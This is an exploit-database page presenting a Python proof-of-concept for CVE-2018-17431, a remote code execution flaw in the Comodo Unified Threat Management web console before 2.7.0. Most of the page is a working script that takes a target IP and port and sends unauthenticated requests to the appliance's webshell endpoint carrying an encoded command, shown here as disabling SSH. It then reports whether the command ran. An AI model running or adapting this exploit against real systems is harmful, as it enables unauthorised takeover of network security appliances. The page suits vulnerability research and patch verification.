Comodo unified threat management web console 2.7.0 remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-09-22 | Type : webapps | Platform : multiple
This exploit / vulnerability Comodo unified threat management web console 2.7.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests

def RndInt(Lenght):
from random import choice
from string import digits

RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)

if __name__ == "__main__":

IP = input("IP: ")
Port = input("Port: ")

Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''

BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart

try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)

SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)